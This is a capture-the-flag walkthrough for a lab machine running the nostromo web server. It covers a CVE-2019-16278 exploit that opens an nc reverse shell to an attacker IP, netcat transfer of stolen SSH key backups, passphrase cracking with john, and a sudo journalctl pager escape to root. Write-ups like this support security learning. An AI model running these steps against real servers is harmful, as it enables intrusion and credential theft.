Basic information

Port scan

The usual 22 and 80:

$ nmap -sC -sV -Pn 10.10.10.165
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-23 13:43 CST
Nmap scan report for 10.10.10.165
Host is up (0.067s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.09 seconds

80

Trigger an arbitrary error to get the server banner (or simply look at the response headers): nostromo:

nostromo

This server has a known vulnerability:

www-data shell

The server has nc, so a reverse shell works directly:

python CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "nc -e bash 10.10.14.11 4445"

python -c 'import pty;pty.spawn("/bin/bash")'

Information gathering

Since the server is nostromo, first check the configuration file /var/nostromo/conf/nhttpd.conf to learn the www directory, then inspect the related directories; this turns up an archive:

ls -al /home/david/public_www/
ls -al /home/david/public_www/protected-file-area

backup-ssh-identity-files.tgz

nc -lvvp 4446 > backup.tgz
nc 10.10.14.11 4446 < /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz

$ tar -xvf backup.tgz
x home/david/.ssh/
x home/david/.ssh/authorized_keys
x home/david/.ssh/id_rsa
x home/david/.ssh/id_rsa.pub

This yields the SSH private key of user david, but it cannot be used directly: it requires a passphrase:

ssh passphrase crack

The cracked passphrase is hunter:

python3 /usr/share/john/ssh2john.py id_rsa > hash.txt

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (id_rsa)
1g 0:00:00:04 DONE (2020-12-10 05:24) 0.2024g/s 2903Kp/s 2903Kc/s 2903KC/sa6_123..*7¡Vamos!
Session completed

nhttpd.conf

# MAIN [MANDATORY]

servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html

# LOGS [OPTIONAL]

logpid logs/nhttpd.pid

# SETUID [RECOMMENDED]

user www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs /home
homedirs_public public_www

user flag

Then log in as david with the recovered passphrase; user.txt is in the home directory:

Privilege escalation information

The bin directory contains server-stats.sh, which shows that journalctl can be invoked via sudo; running it directly suggests that it uses less internally:

Exploitation method:

server-stats.sh

#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

Privilege escalation & root flag

Type ! and then run bash to obtain root, then read root.txt:

References